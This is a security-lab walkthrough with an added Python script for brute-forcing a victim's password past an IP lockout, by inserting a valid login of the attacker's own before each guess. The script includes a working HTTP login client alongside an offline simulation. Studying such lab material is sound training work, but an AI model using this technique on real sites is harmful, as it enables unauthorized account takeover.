Lab: Broken brute-force protection, IP block
This lab is vulnerable due to a logic flaw in its password brute-force protection. To solve the lab, brute-force the victim's password, then log in and access their "My account" page.
Tip: Advanced users may want to solve this lab by using a macro or the Turbo Intruder extension. However, it is possible to solve the lab without using these advanced features.
- Candidate passwords
- With Burp running, investigate the login page. Observe that your IP is blocked if you submit 3 incorrect logins in a row. However, you can reset the counter by logging in to your own account before the limit is reached.
- Enter an invalid username and password, then send the POST /login request to Burp Intruder. Create a pitchfork attack with payload positions in both the
- On the "Payloads" tab, select payload set 1. Add a list of payloads that alternates between your username and carlos. Make sure that your username is first and that carlos is repeated at least 100 times.
- Edit the list of candidate passwords and add your own password before each one. Make sure that your password is aligned with your username in the other list.
- Add this list to payload set 2 and start the attack.
- When the attack finishes, sort the results by username and then by response code. The one request that successfully logged in to Carlos's account receives a 302 response; every other carlos row returns 200.
- Log in as carlos and click "My account" to solve the lab.
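The procedure above, expressed as a script rather than an Intruder configuration. This is an added example, not part of the lab or of Burp: it generates the same interleaved username/password pairs the pitchfork attack uses (a known-good login before every guess), drives them through a login function, and stops as soon as the target's login returns the success status. The simulated endpoint, the account names (wiener/peter, carlos) and the form field names `username`/`password` are constructed assumptions for illustration; `http_login` is a minimal client for a real target and is not exercised offline.

```python
"""Interleaved brute force against a per-IP lockout that resets on a valid login.

Added example, not the lab's or Burp's own code. Account names, the simulated
server and the form field names are constructed assumptions.
"""
import http.client
from typing import Callable, Dict, Iterable, Iterator, Optional, Tuple
from urllib.parse import urlencode, urlsplit

LoginFn = Callable[[str, str], int]  # (username, password) -> HTTP status code


def interleaved_pairs(my_user: str, my_pass: str, target_user: str,
                      candidates: Iterable[str]) -> Iterator[Tuple[str, str]]:
    """Yield (username, password) pairs with a known-good login before each guess.

    This is exactly what the two aligned pitchfork lists in the lab produce:
    set 1 alternates my_user/target_user, set 2 pairs my_pass with my_user and
    one candidate with each target_user entry, so the failure counter is reset
    before it can reach the block threshold.
    """
    for candidate in candidates:
        yield (my_user, my_pass)        # sacrificial login: resets the counter
        yield (target_user, candidate)  # one guess against the victim


def brute_force(login: LoginFn, my_user: str, my_pass: str, target_user: str,
                candidates: Iterable[str], success_status: int = 302) -> Optional[str]:
    """Return the first candidate that logs target_user in, or None.

    Requests are sent strictly in sequence: a reset login that lands after the
    guesses it was meant to protect is useless. If the sacrificial login itself
    stops succeeding, the block has triggered and further guesses are noise, so
    the attack aborts instead of burning the rest of the wordlist.
    """
    for user, pw in interleaved_pairs(my_user, my_pass, target_user, candidates):
        status = login(user, pw)
        if user == my_user:
            if status != success_status:
                raise RuntimeError(f"own login returned {status}: IP block triggered?")
            continue
        if status == success_status:
            return pw
    return None


def http_login(base_url: str, username: str, password: str) -> int:
    """POST /login to a real target and return the raw status without following redirects.

    Assumes the form fields are named username and password (an assumption, not
    confirmed by the lab text above). Not used in the offline demonstration.
    """
    parts = urlsplit(base_url)
    conn_cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(parts.netloc, timeout=10)
    try:
        conn.request("POST", "/login", body=urlencode({"username": username, "password": password}),
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        return conn.getresponse().status
    finally:
        conn.close()


class SimulatedLogin:
    """Constructed stand-in for the lab's /login endpoint (per-IP counter).

    Valid credentials -> 302, invalid -> 200. After `limit` consecutive failures
    the IP is blocked and every request returns 403. reset_on_success=True is
    the lab's logic flaw; False models a counter that only a timeout clears.
    """

    def __init__(self, users: Dict[str, str], limit: int = 3, reset_on_success: bool = True):
        self.users, self.limit, self.reset_on_success = users, limit, reset_on_success
        self.failures = 0
        self.blocked_requests = 0

    def __call__(self, username: str, password: str) -> int:
        if self.failures >= self.limit:
            self.blocked_requests += 1
            return 403
        if self.users.get(username) == password:
            if self.reset_on_success:
                self.failures = 0
            return 302
        self.failures += 1
        return 200


if __name__ == "__main__":
    # Constructed accounts: our own (wiener/peter) and the victim (carlos).
    flawed = SimulatedLogin({"wiener": "peter", "carlos": "password3"})
    print(brute_force(flawed, "wiener", "peter", "carlos", ["a", "b", "c", "password3"]))
```

With a three-strike limit the counter never exceeds one between resets, so two guesses per sacrificial login would also work; one guess per reset costs twice the requests but leaves no room for a stray failure (for example a candidate list containing your own account's wrong password) to trip the block. Against the fixed variant (`reset_on_success=False`) the script aborts on the fourth pair because the own-account login now returns 403, which is the signal to check whether the counter really resets before committing to a long wordlist.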